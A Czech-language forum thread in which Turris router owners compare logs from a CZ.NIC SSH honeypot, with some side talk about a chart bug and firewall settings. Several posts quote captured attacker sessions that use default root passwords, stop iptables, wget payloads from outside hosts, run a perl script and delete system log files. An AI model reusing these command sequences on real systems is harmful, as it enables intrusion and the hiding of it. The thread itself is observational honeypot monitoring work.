Kdo z turristů registruje tento pokus o připojení?
user: root heslo: cisco
command: ifconfig
: grep MemFree /proc/meminfo
vypadá to na pěkný botnet
myslim, že když napíšu všichni tak nebudu daleko od pravdy
Nechá se ten honeypot ze strany CZ.NICu nějak upravovat a přidávat obsluhu dalších příkazů? ... by mě docela zajímalo jestli a co by následovalo, kdyby ten
grep MemFree /proc/meminfo
prošel...
To budete, já to tam třeba nemám. Ale zase mě zlobí jinými příkazy někdo z Holandska. Ale včera byl úplný klid, nechali mě být.
Já nemám ani jeden pokus, jen to co jsem testoval sám.
// tak od 19.6 se to rozjelo a 22.6 mam dokonce 14 pokusu
Vypadá to, že já...
Během 22.6. a 23.6 také hromada pokusů z IP adresy 193.200.227.156 v Polsku.
U mě to zkouší někdo z německa, ale jen admin:admin
a příkazy
uname
free -m
ps x
Jo, to tam mám taky - a dokonce několikrát. I když, když se podívám na ta hesla a použité příkazy, o moc sofistikovaný útok se nejedná. Spíš taková "rekognoskace terénu"
Tak po víkendu nové záznamy, z různých zemí ale to samé:
root:cisco
a příkazy
ifconfig
grep MemFree /proc/meminfo
Asi jen průzkum
U mě se jeden pokus lišil:
z 60.24.123.207
Jméno uživatele: root
Heslo: test
$ /etc/init.d/iptables stop Zamítnuto
$ wget -c
http://118.193.207.159:2201/xwl Přijato
$ reSuSEfirewall2 stop Zamítnuto
$ SuSEfirewall2 stop Zamítnuto
$ service iptables stop Zamítnuto
$ ./xwl Zamítnuto
$ chmod 777 xwl Přijato
Je to možné, že už 6 dní nikdo na náš Turrísek neútočil?
Co Vy ostatní? Jen aby to nebylo nějaké rozbité
.
Také jsem měl pár dní klid, teď je to ale denně.
Já mám jiný problém.
Nejdou mi zobrazit grafy v Safari na iPad2, můžete to někdo vyzkoušet?
Dříve to normálně chodilo, po přidání SSH honeypotu do výpisů to nechodí. Nejde vlevo otevřít výběr grafů.
Pokud to není jen u mě, prosím admina stránek o opravu.
Děkuji.
Do dneška by mě ani nenapadlo, že styly v CSS můžou ovlivňovat chování událostí v DOM, ale zjevně
to možné je. Díky za nahlášení, opraveno.
Měl jsem dříve také problém v Opeře 12.17, i když je to dnes už trochu okrajový prohlížeč.
Tam už ale problém taky zmizel.
Díky...
Zdravím, od 26. klid ....
útočí zatím každý den, nejvíc se snažil tady kamarádíček z číny
Zajímavé, máte také delší klid od útoků? Na našeho Turríska nikdo neútočil od 11. 7. 2015.
Zaznamenávám čilý provoz skoro denně. ( I po nedávné změně veřejné dynamické adresy. )
A nesouvisí to s
tímto příspěvkem? Také jsem měl pár dnů klid, než jsem náhodou objevil zmíněný příspěvek kolegy, upravil nastavení FW pravidla a všechno se zase opět začalo logovat jako dřív.
Vážení, děkuji za rady skutečně to bylo tím, že byla vyplněna vnitřní IP adresa routeru v pravidlech firewallu.
Teď je otázka kolik lidí si myslí, že má funkční SSH Honeypot a po aktualizaci vlastně nemá.
Všichni, výjímka jsou ti co si to tady přečetli. Jako já.
Protože na stránkách dokumentace si toho asi nikdo nevšimne.
Taky jsem neměl tak jsem koukal do dokumentace a zjistil kde je chyba.. Pak to den šlo a potom zase nic. Teď jsem honeypot odinstaloval, resnul router, nainstaloval a znova restartoval a snad to funguje... Otázka je jak dlouho to vydrží :D
No jo, fakt to neběží.. A ano, myslel jsem si, že mi to funguje
Díky za upozornění.
Já jsem uvedený post na fóru zahlédl ale měl jsem dojem, že to bude v pořádku. Dokonce to asi nějakou dobu fungovalo. Dokáže někdo vysvětlit, proč je nutné do pravidla IP adresu nezadávat? Vždyť spojení jde zvenku na program běžící na routeru.
Nevím, třeba z důvodu rozdílného nastavení IP adresy routeru u uživatelů
to kašle na adresu a hlídá jen port.
Tak si myslím, že se někdo pokoušel už o něco víc, než jen testovat. Pokoušel se spustit nějaký kód:
$ cat >/tmp/.xs/daemon.armv4l.mod Přijato 23. 8. 2015 18:49:31
$ mkdir /tmp/.xs/ Přijato 23. 8. 2015 18:49:31
$ chmod 777 /tmp/.xs/daemon.armv4l.mod Přijato 23. 8. 2015 18:50:11
$ /tmp/.xs/daemon.armv4l.mod Zamítnuto 23. 8. 2015 18:50:12
U mne totéž téměř denně z různých IP po světě. Těmto příkazům vždy předchází test:
Třeba:
23. 8. 2015 23:26 Kanada 65.87.255.142 2
Jméno uživatele:root Heslo:root
$ echo -n test Přijato 23. 8. 2015 23:26:59
$ cat /proc/version Přijato 23. 8. 2015 23:27:00
23. 8. 2015 23:54 Kanada 65.87.255.142 4
Jméno uživatele:root Heslo:root
$ mkdir /tmp/.xs/ Přijato 23. 8. 2015 23:54:34
$ cat >/tmp/.xs/daemon.armv4l.mod Přijato 23. 8. 2015 23:54:35
$ chmod 777 /tmp/.xs/daemon.armv4l.mod Přijato 23. 8. 2015 23:55:04
$ /tmp/.xs/daemon.armv4l.mod Zamítnuto 23. 8. 2015 23:55:06
Pak totéž s admin > admin
Vida, tady už se ti to pokouší nainstalovat. :-)
tak přidám jeden největší ze včerejška
23. 8. 2015 08:17 185.86.162.31 41
Jméno uživatele:
root
Heslo:
Hello123
$ ls Přijato 23. 8. 2015 08:17:34
$ wget best1.now.im/1.tar Přijato 23. 8. 2015 08:17:42
$ tar xf 1.tar Přijato 23. 8. 2015 08:17:47
$ rm -rf 1.tar Přijato 23. 8. 2015 08:17:50
$ mv stats/ .stats/ Přijato 23. 8. 2015 08:17:57
$ cd .stats Přijato 23. 8. 2015 08:18:09
$ ls Přijato 23. 8. 2015 08:18:11
$ ls -lia Přijato 23. 8. 2015 08:18:13
$ cd .stats/ Přijato 23. 8. 2015 08:18:24
$ cd Přijato 23. 8. 2015 08:18:28
$ ls Přijato 23. 8. 2015 08:18:30
$ wget best1.now.im/1.tar Přijato 23. 8. 2015 08:18:39
$ tar xf 1.tar Přijato 23. 8. 2015 08:18:48
$ ls Přijato 23. 8. 2015 08:18:50
$ cd stats/ Přijato 23. 8. 2015 08:18:54
$ lls Zamítnuto 23. 8. 2015 08:18:55
$ ls Přijato 23. 8. 2015 08:18:56
$ ls -lia Přijato 23. 8. 2015 08:18:59
$ cd .. Přijato 23. 8. 2015 08:19:05
$ rm -rf stats/ 1.tar Přijato 23. 8. 2015 08:19:11
$ ls Přijato 23. 8. 2015 08:19:13
$ ls -lia Přijato 23. 8. 2015 08:19:15
$ uname -a Přijato 23. 8. 2015 08:19:25
$ perl Přijato 23. 8. 2015 08:19:32
$ wget best1.now.im/1 Přijato 23. 8. 2015 08:19:41
$ perl 1 Přijato 23. 8. 2015 08:19:44
$ perl 1 Přijato 23. 8. 2015 08:20:26
$ perl 1 Přijato 23. 8. 2015 08:20:28
$ perl 1 Přijato 23. 8. 2015 08:20:29
$ ls Přijato 23. 8. 2015 08:20:31
$ rm -rf 1 Přijato 23. 8. 2015 08:20:34
$ rm -rf /var/log/wtmp Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/log/lastlog Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/l og/secure Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/log/xferlog Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/log/messages Přijato 23. 8. 2015 08:20:42
$ rm -rf /var/run /utmp Přijato 23. 8. 2015 08:20:42
$ touch /var/run/utmp Přijato 23. 8. 2015 08:20:42
$ touch /var/log/messages Přijato 23. 8. 2015 08:20:42
$ touch /var/log/wtmp Přijato 23. 8. 2015 08:20:42
$ to uch /var/log/m Zamítnuto 23. 8. 2015 08:20:42
Trvání: [sezení nebylo řádně ukončeno]
Tohle už vypadá na cílený lidský přístup
Registrujete "oťukávání" ze stejné adresy už před tímto útokem?
tahle adresa je jenom jednou
Útočník bude mít určitě jinou IP, než napadený router, který provedl původní oťukání. :-)
Nezobrazí se mi nic v SSH Honepot !
Asi je můj Turrísek imunní proti vpádům cizích " lumpíků "
FAIL Nelze se připojit k 37.221.246.16
ale nevím proč se nejde připojit,když připojení šlape jak hodinky...zas tak dalece tomu nerozumím....
Dnes jsem se podíval na záznamy z SSH Honeypot,
nemám žádné zápisy z období 27.-29.8. a následně 1.-3.9.
Doposud jsem docela dost bombardovaný, máte to někdo podobně?
Pozorujete takové výkyvy?
Například 24.8. mám 32 pokusů.
Jo, taky jsem na to dneska čučel. Od osmadvacátého ani jeden pokus.
Myslím, že před nedávnem kolega omezil přístup botům, kteří používali triviální kombinaci root/root nebo admin/admin (protože jich bylo neúnosné množství). Nemůže to být tím?
Tak to bude asi ono, mám tam jen root/cisco...
Proč nás nikdo neinformoval?
Ony ty změny probíhají potajmu, přece to nebudeme útočníkům usnadňovat ;) Ale vážně - příště bysme možná mohli aspoň poslat notifikaci uživatelům přes web, máte pravdu.
To je v pořádku, nemyslel jsem to zle. Mě udivil ten pokles,
napadlo mě, jestli se odesílá vše v pořádku, jestli není problém u mě.
Dík za info, taky už jsem na to včera koukal.
prosim vas,
ako/kde si mozem prezriet detaily nejakej ssh sessiony?
v sekcii my router na turris.cz ich sice vidim, ale v dost obmedzenej podobe, napr:
$ ifconfig Accepted 9/3/2015 20:39:12
$ cat /proc/meminfo Accepted 9/3/2015 20:39:13
$ cat /proc/version Accepted 9/3/2015 20:39:15
dost by ma zaujimali pouzite credentials.
resp. v jednej z najdlhsich sessionov sa mi tam bot pokusal zapisat subor pomocou cat...akurat ze je ten input vynechany, takze nevidim, co konkretne utocnik zapisoval:
$ mkdir /tmp/.xs/ Accepted 8/22/2015 23:02:40
$ cat >/tmp/.xs/daemon.armv4l.mod Accepted 8/22/2015 23:02:41
$ chmod 777 /tmp/.xs/daemon.armv4l.mod Accepted 8/22/2015 23:02:46
vdaka
Powered by mwForum 2.29.3 © 1999-2013 Markus Wichitill